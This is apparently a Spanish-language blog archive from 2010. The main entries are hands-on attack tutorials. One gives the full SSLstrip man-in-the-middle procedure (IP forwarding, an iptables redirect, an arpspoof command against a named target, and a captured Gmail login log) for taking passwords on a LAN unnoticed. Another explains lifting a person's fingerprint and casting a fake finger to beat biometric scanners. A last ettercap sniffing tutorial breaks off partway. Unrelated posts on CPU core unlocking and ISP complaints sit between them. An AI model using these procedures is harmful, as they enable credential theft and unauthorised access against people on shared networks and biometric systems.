25.11.10

SSLSTRIP - Como conseguir cualquier password sin despertar sospechas en 1 lan.


esta tecnica fue presentada en el black hat dc 2009 por moxie marlinspike y desperto bastante revuelo, no era nuevo como ataque pero si la herramienta que lo automatiza y lo hace mucho mas facil.

pero esto es del año pasado! diran... y encima pongo q es mas viejo, como es posible entonces q siga funcionando y nadie lo parchee. muy facil, no es 1 ataque directo al ssl sino que lo q hace es reemplazar todos los links https x http seguido de 1 ataque mitm como el q vimos en este link:


de esta manera el objetivo se comunica con nosotros x http y nosotros con el servidor de destino x https, obteniendo en el proceso todas las passwords en texto plano q despues enviamos encriptadas a su destino final.

con esto salvamos el problema de certificados q tenemos usando ettercap como habiamos visto aca:


haciendo transparente el logueo para el objetivo... peligroso no?...


preparando el sistema

voy a explicarlo para debian/ubuntu, si tienen fedora o derivados cambien x yum. 1ero instalamos python y python-twisted-web:

apt-get install python python-twisted-web

despues descargamos sslstrip, pueden buscar algun link o bajarlo de la pagina del autor:

http://www.thoughtcrime.org/software/sslstrip/

podemos hacer 2 cosas, instalarlo o correrlo desde el directorio de descarga. para instalarlo:

python ./setup.py install

de esta manera queda accesible desde la consola, sino para ejecutarlo:

python sslstrip.py (opciones)


el ataque

lo 1ero es activar el reenvio de paquetes, esto lo hacemos cambiando de 0 a 1 el valor del archivo ip_forward q se encuentra en /proc/sys/net/ipv4/, editandolo o simplemente poniendo en la consola:

echo "1" > /proc/sys/net/ipv4/ip_forward

despues configuramos iptables para q reenvie el trafico a ssltrip, el puerto q queremos redirigir es el 80 hacia el 10000 q es el default del programa. si quieren usar otro puerto x alguna razon este es el momento de elegirlo, despues al lanzarlo se puede cambiar. el comando seria:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (o el q quieran)

ahora corremos sslstrip, si lo instalaron simplemente:

sslstrip -w nombrearchivo

donde "nombrearchivo" es 1 nombre para el archivo donde van a quedar logueados los datos. si cambiamos el puerto usamos el modificador -l:

sslstrip -w nombredearchivo -l numdepuerto

si todo esta bien instalado deberiamos ver esto:

sslstrip 0.6 by Moxie Marlinspike running...

ahora solo falta hacer el envenenamiento arp para q la otra maquina nos mande su trafico, podemos usar exactamente el mismo metodo de la entrada q cite antes y el resultado simplemente seria q el objetivo no tendria el famoso mensaje del certificado ya que el trafico pasaria x el puerto 80, el user/pass saldria en la pantalla inferior como cualquier pass de texto plano y a su vez se puede ver en el log de ssltrip:

2010-11-25 19:48:39,529 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%
2F%3F&service=mail&rm=false&dsh=3151454474180978812&ltmpl=default&hl=en
&ltmpl=default&scc=1&ss=1&timeStmp=&secTok=&GALX=HirBaqYb1RQ&Email=
ACA_SALE_EL_CORREO&Passwd=ACA_LA_PASSWORD&rmShown=1&signIn
=Sign+in&asts=

pero podemos hacerlo mas facil para no tener q usar ettercap simplemente instalando la suite dsniff:

apt-get install dsniff

dsniff daria como para otra entrada completa pero ahora vamos a usar solamente arpspoof para hacer el envenenamiento. despues de instalar dsniff ponemos en la consola:

arpspoof -i interface (eth0, wlan0, ath0 o la q sea) -t target (maquina objetivo) gateway (el router)

x ej:

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

en la consola veriamos algo como esto repetirse una y otra vez:

0:5:4e:4d:15:30 0:1e:e5:fc:10:65 0806 42: arp reply 192.168.1.1 is-at 0:5:4e:4d:15:30

0:5:4e:4d:15:30 es nuestra mac, q queremos q el objetivo (0:1e:e5:fc:10:65) crea q es el router, entonces lo q le decimos es q 192.168.1.1 (el router) esta en (is-at) nuestra mac (0:5:4e:4d:15:30)

si hacemos en el objetivo 1 arp -a vamos a ver que nuestra ip y el router tienen la misma mac, el envenenamiento tuvo exito.

sslstrip ya esta capturando trafico ssl y guardandolo en el log, solo hay q abrirlo y ver q hay...



14.7.10

Como vulnerar un sistema de Biometria - Huellas dactilares - by Alesteir


este tutorial fue escrito x mi amigo Alesteir hace unos 2 años en 1 momento muy especial, en 1 foro q en su nombre lleva la palabra "hacker" pero ya no queda practicamente ninguno, si quedo mucho warez, porno y algo d offtopic.

los otros dias encontre este texto en 1 foro "administrado" x alguien q c negaba a este tipo d temas (sera xq no sabe ni usar 1 proxy xD) y ni siquiera c ponia la fuente.

no lo encontre completo (y con su fuente correspondiente) en ningun otro lado d la red y me parecio justo q tenga su lugar con el nombre d su autor bien claro.


Burlando Biometria By Alesteir

A Continuación os enseñare un método a seguir para falsear huellas dactilares o digitales (como le llaman algunos), lo cual es un método mas para vulnerar cualquier sistema basado en seguridad biométrica de huellas digitales y por ende es de aplicación neta al hacking y a los sistemas informáticos. Para poder falsificar cualquier huella necesitamos encontrar la original primero (es aca donde se puede recurrir a la ingeniería social para conseguir la huella deseada , jejejeje), además de que es necesario poder tener una buena impresión.

Es aquí donde entra el rollo de la ciencia forense. Hay que entender que las huellas estan compuestas por crestas papilares, son estas crestas -las elevaciones- y surcos (las grietas), las que le dan esa característica única a cda huella, ya que ninguna huella es igual a otra, asi sean de la misma persona, y son los distintos recovecos y formas de estos elementos, los que las hacen únicas e irrepetibles, y para hacer dictamenes se necesitan una cantidad determinada de puntos característicos coincidentes para poder dar un correcto resultado, la clasificación de estos puntos, su topografia, añadidas a otras cuestiones tecnicas son las que forman las bases de la dactiloscopia como ciencia, es por eso que se han usado y se siguen usando las huellas digitales como un método de identificación personal, es sabido que recientemente se usan en cuestiones de biometría, aplicadas a la seguridad en general), hay que tener en cuenta que es la presión ejercida (al tener contacto con superficies de distinto tipo tales como: espejos, vasos y envases, picaportes, vidrios, acetatos, pantallas de pcs y muchos objetos mas), la que determina de que una huella se imprima en una superficie, es cierto que existen otros factores mas que influyen a que una impresión sea buena o no (el polvo es una de ellas), y este es uno de los items determinantes a la hora de hacer una recolección de huellas dactilares (ojo, que las partes lisas -por lógica- son los focos mas frecuentes para encontrar buenas huellas (para clasificar una huella como buena debe verse tan siquiera un 75 % de la misma, aunque también se pueden hacer reconstrucciones a partir de fragmentos) , nunca encontraríamos una huella en una superficie rugosa y con porosidades, ya que no se tendría el suficiente contacto por parte de las crestas de la huella con la superficie. En unas imágenes que se ven mas abajo, se ve una buena impresión dactilar(después de revelada lógicamente), por lo tanto nos valdremos de objetos y elementos caseros, pero que serán efectivos a la hora de hacer una recolección, para posteriormente ser usada, he de advertir que el uso que se le de a esta información solo depende de cada cual.

El método hacer una huella visible mas usado desde hace mucho es el de aplicarle un poco de carbón en polvo (el cual lo podemos hacer con un poco de carbón vegetal –pulverizándolo y pasándolo por un cedazo, para dejarlo lo mas fino posible), otra forma es pasando la mina de un lápiz contra una lija, hasta obtener una cantidad suficiente:
A un pincel de esos que usan las mujeres para aplicarse el rímel en los pómulos (debe ser muy suave y fino) lo untamos con el polvo revelador, y lo pasamos muy suave por el lugar donde se aprecia la huella dactilar.

Otra método muy casero también pero muy efectivo es: echar unas gotas de pegante instantáneo dentro de una tapa plástica de agua mineral, y lo ponemos sobre la impresión de la forma en que se aprecia en las siguientes imágenes:





El principal ingrediente del pegante superglue produce una superficie blanca sobre la huella (mas concretamente sobre la grasa), revelándola a nuestros ojos y permitiéndonos hacer una recolección, bien sea física o de soporte fotográfico:

La siguiente parte envuelve la recolección física (En caso de que no contemos con cámara digital, pero esta parte la omito por el momento), la cual se hace con un poco de papel Contac, el proceso se hace pegando el papel sobre la impresión ya revelada, una vez la tenemos, procedemos a poner el Contac de nuevo sobre el papel blanco que lo recubre, la escaneamos y seguimos con el procedimiento para hacer el molde para hacer cuantas veces queramos nuestra huella, La clave de todo el proceso es lograr capturar o recolectar una huella fidedigna y casi exacta a la original, la cual al final es la que nos permitirá hacernos con nuestra goma o huella postiza lista para usar, para ello debemos usar un papel acetato transparente, del usado en los proyectores e imprimir las huellas con una impresora laser (es la capa que deja el toner al imprimir la clave de todo el cuento):

La impresora laser deja un pequeño pero eficiente relieve para nuestros designios que por cierto imprime la huella al revés, y como lo que necesitamos es un negativo, pues genial) esto es lo que vamos a aprovechar para crear nuestra goma:

Una vez tenemos las impresiones dactilares en el acetato procedemos a cubrir la huella con un poco de pegante para madera o Colbon que llaman:



(para hacerlo mas manejable, le agregamos un poco de glicerina)

Repartimos bien el pegante hasta formar una capa, esperamos a que se seque el pegante.

Separamos la goma seca de la hoja de acetato.

La recortamos al tamaño de nuestro dedo.

Ya para terminar con un poco de pegante natural o de teatro pegamos nuestro huella falseada a nuestro propio dedo

Listo!, ya tenemos nuestra huella trucada ¡


29.6.10

Como pagar un Phenom II x2 y tener un Phenom II x4 (Core unlocking)


a quien no le gustaria pagar casi la mitad x un micro d 4 nucleos? bueno... no es muy dificil, en la mayoria d los ultimos modelos d AMD se pueden liberar nucleos ocultos.

como a la gente le gusta cada vez mas "tocar" el hardware, los motherboards vienen con mas y mas opciones para manejar voltajes y frecuencias y eso hace q c puedan hacer cosas interesantes. lo q antes era 1 dolor d cabeza cuando teniamos q meter jumpers para configurar dmas, irqs, multiplicadores y otras porquerias, ahora aparece como opcion en casi cualquier mobo q c respete.

hace unos meses vole mi mobo asus mn2-sli deluxe... chipset... irreparable, en su momento lo pague algo asi como 250usd, no duro 3 años. conclusion despues d llevarlo a un ingeniero q fue el ultimo recurso, no comprar mobos caros, son los q mas c rompen y los q menos c pueden reparar, un asus standard es suficiente. entonces fui y compre un modesto M4A785-M.

tenia 1 athlonX2 5600 q d paso decidi cambiar, las opciones estaban entre un phenomII x3 o x4. el x4 era el 920 y el x3 720 pero "black edition", entre otras cosas es altamente overclockeable y la diferencia d precio era mucha asi q fui x el ultimo.

... suerte q compre s xq ahora es 920, y lastima q no compre el x2 550 o 555 xq hubiera sido lo mismo pero mas barato todavia xD


binning

"binning" es el proceso q hace el fabricante para testear los chips y asignarlos segun los resultados a la linea d productos q le corresponde. los chips q soportan altas velocidades con todos sus cores funcionando a la perfeccion van a la linea d punta, los q fallan c van asignando a velocidades a las q c comportan d manera estable y del mismo modo c desactivan los cores q presentan fallas.

esto x supuesto no es tan asi, cuando c lanza una nueva linea hay muchos fallos en la produccion q despues c van corrigiendo hasta q 1 porcentaje muy bajo presenta fallas. como todos los micros son fabricados con 4 nucleos llega un momento q por razones d mercado hay q desactivar si o si algunos para vender los x2 y x3... no todo el mundo (como yo) quiere gastar lo q vale el x4.

en la foto d arriba c pueden apreciar perfectamente los 4 nucleos en el 550.


AMD

en realidad AMD nunca tuvo una posicion demasiado clara sobre el tema, x 1 lado c beneficia con las ventas ya q mucha gente compra x2 y x3 ya q termina siendo una alternativa baratisima frente al quad-core d intel q cuesta una fortuna. x otro lado c hablo en 1 momento d q estaban forzando a algunos fabricantes d mobos a blockear la opcion en futuras actualizaciones d bios, cosa q parece q no paso con asus xq el mio tiene bios d enero d este año y desblockeo sin problemas.

c hacen cargo d todo el tema y x supuesto no ofrecen ningun soporte ante fallas en el desblockeo, si ellos lo blockearon x algo sera ;)


tambien puede no funcionar...

antes del proceso aviso q esta la posibilidad d q realmente tengan 1 o 2 cores dañados, la verdad q me parece bastante remota si es nuevo xq antes q el mio probe algunos y todos funcionaron, pero puede pasar.

el problema mas grave es q no bootee la maquina al hacer el cambio, ante esto con 1 simple reset d bios alcanza para tenerla otra vez funcionando, tengan a mano el manual del mobo x las dudas...

tambien puede arrancar y despues ser inestable, aca ya entramos en otro terreno. tal vez c pueda llegar a estabilizar subiendo el voltaje al micro pero no recomiendo tocar esas cosas si no saben lo q estan haciendo. el sintoma son cuelgues, pantallas azules en win, etc. en 1 palabra... inestabilidad.


motherboard

el mobo tiene q soportar la opcion ACC (Automatic Clock Calibration) o NCC (NVidia Clock Calibration) q es la respuesta de nVidia a esta nueva "moda". hay distintos modelos d chipsets q lo permiten segun la marca yendo desde precios economicos hasta la alta gama. busquen la opcion en el bios, o si van a comprar haciendo una busqueda en google c pueden checkear los modelos con soporte.

esta es 1 pequeña lista d mobos en los que se llevo a cabo el proceso con exito:



Asus

GeForce 8300
M4N78 Pro - 1004 Official Bios

nForce 980a SLI
M4N82 Deluxe - 0906 Official Bios

770G/SB710
M4A77TD PRO - 1007/0316 Official Bios

785G/SB710
M4A785D-M PRO - 405 Official Bios
M4A785M - 0503 Official Bios

785G/SB750
M4A785TD-V EVO - 0410/0602 Official Bios

790X/SB750
M4A79XTD EVO - 0605/0704 Official Bios

790FX/SB750
M3A79-T Deluxe – 0030 Mod Bios
M4A79 Deluxe – 1602 Official Bios
M4A79T Deluxe – 0079 Mod Bios/1801 Official Bios
Crosshair III Formula - 0702 / 1003

790GX/SB750
M3A78-T – 0023 Mod Bios
M4A78-E – 1204/1803 Official Bios
M4A78-E SE – 0023 Mod Bios
M4A78T-E – 1402 Official Bios

890GX/SB850
M4A89GTD-PRO/USB3 - 0307 Official Bios


Asrock

780G/SB710
A780GMH/128M - 1.50 Bios

785G/SB750
A785GMH/128M - 1.00 Bios

790GX/SB750
AOD790GX/128M – 1.40 Bios
A790GMH/128M - 1.20 Bios
A790GXH/128M – 1.20 Bios
A790GX/128M - ???


Biostar

785G/SB710
TA785GE 128m - 88GCO720CE Mod Bios

790GX/SB750
TA790GXBE
TA790GX A3+ - 78DAA616 Mod bios
TA790GX 128M – 78DEA113 Official bios
TA790GX3 A2+ - A78DA113
TA790GX A2+ - 78DBA113 Official bios - SUCCESS!!


DFI

790FX/SB750
DK 790FXB-M3H5 – 04/02/2009 Bios
DK 790FXB-M2RSH – 03/10/2009 Bios
DK 790FXB-M2RS - 02/24/2009 Bios

790GX/SB750
JR 790GX-M2RS – 10/30/2008 Bios – SUCCESS!!


Gigabyte

nForce 720D
GA-M720-US3 - F4 Bios

760G/SB710
GA-MA78LM-S2 - F1 Bios

770X/SB710
GA-770TA-UD3 - F1 Bios
GA-MA770T-UD3P - F2c/F3 Bios

785G/SB710
GA-MA785GM-US2H - F5 bios
GA-MA785GMT-UD2H - F3/F5 Bios

785GX/SB750
GA-MA785G-UD3H - F1/F5b Bios
GA-MA785GT-UD3H - F4/F5a Bios
GA-785GMT-USB3 - F1 Bios

790X/SB750
GA-MA790X-UD3P - F4 Bios
GA-MA790X-UD4 – F3 Bios
GA-MA790X-UD4P – F5/F7/F9 Bios
GA-MA790XT-UD4P - F4G/F5/F6/F7 Bios

790FX/SB750
GA-MA790FX-UD5P - F4c Bios
GA-MA790FXT-UD5P – F3b/F5 Bios

790GX/SB750
GA-MA790GP-DS4H – F3h Bios
GA-MA790GP-UD3H - F1 Bios
GA-MA790GP-UD4H – F3h Bios
GA-MA790GPT-UD3H - F2 Bios


MSI

770X/SB710
770-C45 – 1.3 Offical Bios/1.3B2 Special Bios/10.2

785G/SB710
785GT-E63 - 28.0 08/13/2009 Bios
785GTM-E45 - 8.0 09/07/2009 Bios
785GM-E65 - 2.3 Official Bios

790FX/SB750
790FX-GD70 – 1.5B1/1.5B2/1.5B3/1.7 Bios

790GX/SB750
790GX-G65 – 1.4B2 Special Bios
DKA790GX - 1.8 Bios for Platinum version of mobo
DKA790GX Platinum – 1.9b2 Bios

KA790GX - No funciona
KA790GX-M - No funciona

estos 2 ultimos mobos a pesar d tener el southbridge sb750 q es capaz d desbloquear tienen la opcion anulada.


micro

el micro depende d lo q quieran gastar y lo q quieran tener, los phenomII x2 y x3 son desbloqueables a x4 y los x4 con un poco d suerte a x6. para los q quieran gastar menos los sempron tambien son desbloqueables, x ej el sempron 140 c puede llevar a athlonII X2.

para comprar yo compraria un x2 550 o 555 black edition por la relacion calidad/precio. hay q tener en cuenta q esta edicion esta hecha para soportar overclocking y x lo tanto es mas estable q uno comun, 130usd aprox me parece un muy buen precio x 4 nucleos.


el proceso

el proceso es el mas sencillo del mundo, solo hay q buscar la opcion en el bios y ponerla en auto. en el caso del M4A785-M fui a "advanced" y dentro d la conf del micro a:

ADVANCED CLOCK CALIBRATION -> AUTO

con esto c abrio otra opcion llamada "unleashing mode", tambien la active:

UNLEASING MODE -> ENABLED

y despues aparecio donde pregunta si c quieren usar 3 o 4 cores:


ACTIVE CPU CORES -> 4 CORE OPERATION


al reiniciar me salio el msg "4 cores are activated" y despues d unas horas d test parece q todo esta ok.


ANTES


DESPUES


no c fijen en las velocidades y el multiplicador, esta activado cool&quiet como c puede ver x las diferencias d voltaje y eso hace q cambien segun el requerimiento del sistema.

ahhh.... y 1 vez mas, gracias amd!! ;)

6.6.10

Fibertel, Speedy y Telecentro (Argentina) - Como hacer para que no nos roben tanto los proveedores de internet.

es 1 realidad no solo en argentina sino en la mayoria d los paises q los proveedores d internet, a los cuales llamaremos ISP (Internet Service Provider) d ahora en adelante, no dan el servicio d deberian. a mucha gente no le importa lo mas minimo mientras puedan usar el msn y no tarden mucho en subir sus fotos a facebook, tal vez el problema mayor empieza cuando c cuelgan los videos d youtube... je

lo cierto es q la velocidad casi nunca es la q deberia ser (sobre todo en horarios pico) y q si pagamos x 1 servicio eso es lo q deberiamos recibir exactamente, mas alla d q el msn funcione o no. tambien estan los problemas d cortes d servicio, desconexiones, mala calidad, etc, pero eso ya es otra historia.

solamente voy a hablar d los 3 isp del titulo xq son los q tuve mas experiencia directa, los demas tienen sus cosas tambien pero no voy a hablar x boca d 3eros sino x experiencia propia. podria agregar a telmex, pero solo conozco los servicios corporativos. como comentario, no funciona mal, pero los dias d tormenta olvidense d la conexion...


Precios

los precios obviamente estan infladisimos, piden cerca d 140 o 150$ argentinos (casi 40usd) x una conexion d 3mbps. eso x supuesto "sin promocion" o "despues d terminada la misma". Todos los ISP dan promociones x 6 meses a mitad d precio y despues empiezan a cobrar el monto total.

la mayoria sabemos (o quiero pensar q la mayoria) q si estamos en una zona donde podemos elegir, simplemente aceptamos la promocion y en el ultimo mes pedimos la baja, con lo cual nos llama atentamente nuestro ISP unos dias antes d finalizar y nos ofrece una nueva promo, tal vez mas jugosa q la anterior. garantizo q lo hacen, sino saben q lo unico q tenemos q hacer es cambiar d proveedor x 6 meses y despues volver con otra promo.

al darse cuenta d la situacion simplemente la extienden. en fiber es automatico despues d 1 par d veces d amenazar con la baja, directamente al finalizar extienden la promo x 6 meses o 1 año. pero si nadie dice nada ni amenaza con irse x supuesto q pasan a cobrar el precio full.

x ej en fibertel estuve pagando durante casi 2 años la mitad del precio (unos 60$), cuando hace unas semanas pedi la baja x enesima vez (pero ahora d verdad) me llegaron a ofrecer cable mas 3mbps a 150$ final. asumiendo q el cable cuesta unos 120$, la conexion d 3mbps me la estarian cobrando 30$??? xD


Velocidad

el tema d la velocidad varia en cuanto a zonas pero aun pudiendo tener una buena conexion por nuestra situacion geografica, es posible llegar a tener una malisima si no la checkeamos. cuando fiber subio la velocidad d 1 a 3mbps funcionaba peor q antes. esa fue una d mis 1eras peleas con ellos q termino en 1 año a 50$.

este problema es mucho mas dificil d solucionar q el del dinero ya q para la mayoria d los "mortales" es 1 misterio como funciona internet y como saber cuanta velocidad tiene y cuanta deberia tener, y x supuesto los isp tratan d mantener este "misterio" todo lo q pueden hablando a los "profanos" con terminos q dan risa sobre problemas q dan todavia mas. la placa d red, virus, el cableado, rayos cosmicos... cualquier causa es buena para confundir al usuario y q no moleste mas x un rato.

ojo... esto no quiere decir q estos problemas no puedan existir (salvo x los rayos cosmicos), pero el 99% d las veces el problema es d ellos.

tenemos 2 tipos d conexiones diferentes entre estos proveedores, speedy es adsl y fiber y telecentro cable, el adsl corre x la linea telefonica y el cable como es obvio x la red q le corresponde. la gran diferencia entre estos 2 servicios es q el adsl tiene una conexion punto a punto hacia la central y el cable no, el cable conecta x sectores a un nodo en comun, lo q hace q si hay muchas maquinas conectadas a s nodo c sature, como pasa en muchos lugares en el caso d telecentro, q es donde mas se puede apreciar el problema.

en este caso tenemos q lograr 1ero la velocidad prometida dentro del nodo para tener una remota posibilidad d tenerla despues hacia internet, si no la tenemos c crea el tipico "cuello d botella". todo esto c puede medir, c puede reclamar y llegado el punto c puede denunciar... o cuando menos usar para q nos arreglen el servicio o nos den algun "beneficio extra" en pago x las molestias.


Speedy

Personalmente con speedy fue con los q menos problemas tuve, tal vez xq fue d los 1eros y xq tenia conocidos en la empresa... je. El problema mayormente es el soporte, cuando funciona bien x lo gral queda asi y todo oka, el tema es lograr q alguien nos atienda si tenemos problemas.

speedy es d telefonica, telefonica ya todos sabemos lo burocratica q puede llegar a ser, llegue a hacerles denuncia en la CNC (Comision Nacional de Comunicaciones) para q muden mi linea d telefono a 2 cuadras d distancia despues d 7 meses!?!?...

con speedy es mas o menos lo mismo, si les funciona bien... recen para q siga asi y si no tienen otro proveedor en su zona... recen para q aunque sea funcione. speedy llega a muchos lugares donde no llega otro proveedor y esos usuarios son los q tienen los peores problemas, tipico d cualquier monopolio.

speedy nos proporciona 1 test d velocidad en su pagina, no es confiable pero es el 1er paso al hacer 1 reclamo, la "boca d la botella", si la conexion en s test no mide lo q tiene q medir nunca lo va a hacer contra 1 server real cuando quieran bajar algo.

si tienen speedy pueden checkear el 1er tramo d su conexion aca:

www.speedy.com.ar/medidor-de-velocidad/

mas adelante 1 test confiable para todos...


Fibertel

Con fibertel es mas o menos lo mismo, si haces q funcione bien no tenes mas problemas, pero para eso tenes q hacer 200 reclamos, anotarte todos los numeritos, pedir la baja y recien ahi t va a llamar alguien ofreciendo lo q quieras.

los del soporte no entienden nada la mayoria (como d costumbre), creo q hable con casi todos. a uno c le escapo una d las 1eras veces q llame la pagina d testeo, digo "c le escapo" xq despues extrañamente nadie me "invitaba" a hacer 1 test d velocidad, entonces les decia q "en una llamada anterior me pasaron esta pagina" y al mostrarles los resultados no podian inventar mucho.

la web para checkear la velocidad de fiber es esta:

http://sps.fibertel.com.ar/

si vamos a:

pruebas d velocidad -> download

encontramos 2 tipos d descargas, nacional e internacional. esto es muy bueno xq podemos mediante su propio test checkear tanto en servidores propios d fibertel como en servidores externos. x lo gral la descarga nacional es perfecta y el problema esta con la internacional, a pesar d ser cable fiber tiene mejor estructura q telecentro y no hay tanta saturacion en los nodos, igualmente 1ero es bueno checkear la nacional.

la internacional va cambiando periodicamente, pero x lo gral no tengo quejas, son servers normales d internet desde donde tranquilamente c podria estar descargando algo. en este momento la descarga 3 es 1 rpm del wireshark xD... andaran en cosas raras estos chicos? je

si la descarga no va a la velocidad q deberia o cerca, llamen, pidan 1 num d caso d soporte y anotenlos todos.

otro tema q daria mucho para hablar sobre fiber es el conocido blockeo d puertos. muchas cosas estan blockeadas, no llegue nunca a saber cuantas exactamente pero son bastantes. para un user normal no tiene mucha importancia, para uno avanzado puede llegar a traer bastantes problemas y en todo caso me parece una invasion a la conexion.

si yo quiero tener una casa con 3 puertas y viene el estado y me pone pared en 2 diciendo q necesito 1 sola y q asi es mas seguro... deberia dejar q lo haga? o deberia encargarme yo d decidir cuantas puertas quiero? ademas... no deberian x lo menos avisarme q estan clausurando mis puertas?


Telecentro

telecentro... telecentro... si, cai en la trampa d telecentro, como dije antes estoy en 1 zona con muchos isp y me gusta probar. cable digital, internet 3mbps y telefonia ip a 160$... barato no? xD

con la telefonia no tenia muchas esperanzas, c corta todo el tiempo, da ocupado, si le pongo el inalambrico hace 1 ruido terrible y no es el trafo, ni la linea d corriente, ni el cable, ni "ponele 1 filtro d rf", ni nada q c pueda calificar d "normal". el soporte dice "sr, es el telefono obviamente" a lo cual respondo "en este momento t hablo desde s telefono pero desde 1 linea tradicional y funciona perfecto"... silencio... me recomienda poner otro filtro... cruzamos un par d frases forzadas y le corto.

el dia d la instalacion cuando ponen el modem checkeo velocidad contra telecentro, todo ok, contra 1 servidor en usa, todo ok, europa, todo oka, firmo contento y creo q esta todo bien... gran error.

ya venia el fin d semana y no tuve mucha oportunidad d usar la conexion, a la semana siguiente x la tarde me parecio notarla lenta, checkeo y no llegaba al mega. al principio crei q me habian cambiado a 1mbps, despues me di cuenta q era problema d saturacion cuando c libero despues d las 12 d la noche.

la mayoria d los isps ante 1 problema asi alegan cualquier cosa (como rayos cosmicos) pero telecentro tiene el descaro d hacerse cargo, ante 1 correo al sopote (cansado d esperar q me atiendan x tel) con capturas d pantalla d las mediciones y 1 completa descripcion del problema me respondieron lo siguiente:

Estimado Sr.
Le informamos que gracias a su reclamo, y sumados a otros, se están preparando tareas abocándose al desperfecto que provoca fluctuación del ancho de banda en determinadas franjas horarias. Pedimos disculpas por el inconveniente. Esta información fue sacada gracias al RA XXXXXX.
Desde ya, muchas gracias.
Buenas días.


Departamento de Soporte Técnico
Telecentro S.A.
soporte@telecentro.net.ar
www.telecentro.com.ar
6380-9500


o sea... traducido:

Estimado Estafado.

Le informamos q su conexion nunca va a funcionar a lo q ud paga dado q no tenemos la estructura necesaria para el numero d clientes q poseemos. Seguiremos sumando clientes para tratar d pagar una estructura q cada vez queda mas chica.
Buenas? dias.


para q venden conexiones q no pueden dar?... en fin, veremos si c puede sacar algo d esto y sino... a cambiar d vuelta.

la pagina de telecentro para hacer test d velocidad es:

http://velocidad.telecentro.net.ar/

ahhh... el cable c v impecable, mucho mejor q cablevision y mas canales xD


Test de velocidad fiable

Los tests d velocidad d las paginas no son fiables xq no miden la velocidad en condiciones reales, el de telecentro es una mentira q jamas sale siquiera a internet, solo mide la velocidad dentro d su propia red... y aun asi no mide lo q deberia. esta sacado d la pagina q pongo a continuacion donde tienen 1 server propio. no digo q es 1 mentira x la medicion en si sino x las condiciones en q c hace.

para tener 1 medicion real tenemos q checkear contra servidores internacionales q es donde navegamos generalmente y d donde bajamos cosas o vemos videos. para hacer 1 medicion real vamos a esta pagina:

http://www.speedtest.net/

este es mi resultado en telecentro 1 sabado a la tarde... y dio bastante bien (ni comento el ping d 158ms en mi propia red...):

con esta conexion, baje d donde sea no voy a pasar los 2.1mbps en el mejor d los casos. la velocidad a miami.fl, usa x ej:

y a 1 server en leipzig, deutschland:

bastante lejos d lo prometido no? para hacer el test simplemente tienen q pinchar en uno d los servers y esperar q la pagina haga el resto.

al terminar provee d 1 link en la parte inferior junto con los resultados, haciendo click en "copy direct link" c carga en el portapapeles. este link es aceptado como un test valido para gran cantidad d instituciones a nivel internacional y es muy fiable.


Conclusion

todos los isps van a tratar d darles lo minimo posible, lo ideal es checkear q este todo ok y en caso d q no reclamar 1ero a ellos, si no solucionan el problema directamente a la CNC. en una entrada anterior hay algo d info d donde y como hacer la denuncia y les aseguro q da resultados, pueden verla aca:

|_ocutus&CNDC vs Samsung y |_ocutus&CNC vs Telefonica

16.5.10

packet sniffing... o como conseguir passwords (y otras cosas) en cualquier red.

habia prometido hace unos meses 1 articulo sobre arp poisoning en la practica (ARP Poisoning), esto x supuesto llevo a agregar algo d sniffing y el sniffing a otras cosas asi q decidi dividirlo en varias entradas para mantener el orden y no hacerlo tan largo.

c recomienda leer el articulo anterior para tener idea d lo q estan haciendo y d esa forma poder desarrollar otro tipo d tecnicas asi como tener la posibilidad d usar cualquier soft q quieran ya q sabiendo el proceso c puede hacer d muchas maneras distintas.

este metodo es aplicable en cualquier red lan, no importa si tiene 2 o 2000 maquinas, no importa si son win o linux, si es cableada o wifi, si usan firefox, ie, opera o lo q sea... no importa casi nada, salvo q tengamos nuestra maquina conectada a la red.


packet sniffing

tambien llamado packet analysis es el proceso de capturar trafico de la red y analizarlo. aunque normalmente es asociado con actividades "hacker" el analisis d paquetes es una herramienta valiosisima para cualquier admin d redes, util para diagnosticar problemas q haya en la misma, asi como tambien detectar cualquier tipo d ataque, anomalia o hasta algun user q consume demasiado trafico... ;)

el trafico de red, como todos sabemos (o deberiamos saber si queremos hacer estas cosas), se divide en paquetes q cumplen distintas funciones. en la entrada anterior hablamos de los paquetes arp pero hay muchas otras clases. como seria 1 tema muy extenso (tal vez 1 futura entrada en el blog) dejo una animacion muuuyyy facil d entender para los q no tienen idea. la mayoria es aplicable, salvo algunas cosas en desuso como el viejo "ping d la muerte"...

entonces todo lo q tenemos q hacer es usar 1 sniffer para capturar s trafico y ver lo q nos interesa. con la tecnica del arp poisoning vimos q podemos engañar a 1 maquina para q crea q nosotros somos el router y al router para q crea q somos esa maquina, d esta forma nos "paramos" entre medio d las dos y realizamos el ataque llamado Man In The Middle (MITM). pero antes algunas aclaraciones.


verdades y mitos

la red esta llena d personitas preguntando "como hackear passwords de hotmail" y lleno d otras tantas q ponen tutos en los q hacen 1 simple envenenamiento y activan el sniffer mostrando resultados con passwords d hotmail, gmail, yahoo, etc. lo cierto es q c puede hacer, pero no es tan facil y se requiere hacer alguna cosa mas.

las passwords no c transmiten todas del mismo modo, no es lo mismo el login d 1 ftp q el d hotmail x ej donde entra en juego encriptacion ssl, intercambio d certificados, etc., para ver s tipo d contraseñas necesitamos hacer algun paso adicional.

hasta no hace mucho la tecnica acostumbrada era enviar al navegador 1 certificado falso, el cual muestra el tipico mensaje d q el certificado no es valido. como el 90% (si no mas) d los users simplemente lo aceptan y siguen su camino c podria decir q tiene bastante efectividad...

sin embargo el año pasado c presento en el black hat dc 2009 la tecnica llamada sslstrip. lo q hace basicamente es reescribir todos los links https a http, despues reconstruye las urls con 1 certificado valido y redirige la conexion hacia su destino original despues d quedarse con los datos... sin alertas, sin llamar la atencion d nadie... perfecto xD


sniffing/poisoning basico

como dije q era practica dejo las explicaciones d lado y vamos a ver el tipico tuto d ettercap (sin errores ni omisiones) q sirve para capturar passwords en texto plano. esto es ftp, telnet, foros e infinidad d paginas, sitios e intranets q no usan encriptacion en los logins.

hay versiones d ettercap tanto para win como para linux, obviamente c recomienda linux para este tipo d "actividades". la instalacion del programa no tiene demasiadas complicaciones. para win c puede descargar d aca (la version q dice win32.exe):

http://sourceforge.net/projects/ettercap/files/

en linux desde el gestor d paquetes o:

http://ettercap.sourceforge.net/download.php

en win abre directamente en modo grafico en linux desde la consola en modo root (o con sudo) ejecutar "ettercap -G".

c abre la ventana del programa, seleccionamos el menu SNIFF -> UNIFIED SNIFFING...

